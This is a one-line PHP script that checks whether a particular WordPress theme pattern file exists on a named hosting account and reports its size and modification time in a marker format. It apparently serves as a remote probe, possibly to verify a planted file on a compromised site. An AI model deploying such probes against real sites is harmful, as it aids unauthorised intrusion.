<?php $p = "/home/turkishi/public_html/wp-content/themes/twentytwentyfour/patterns/cta-pricing.php"; if (file_exists($p)) { $fs = filesize($p); $ft = filemtime($p); die("!cfs:{$fs};cft:{$ft}!"); } else { die('!not_found!'); }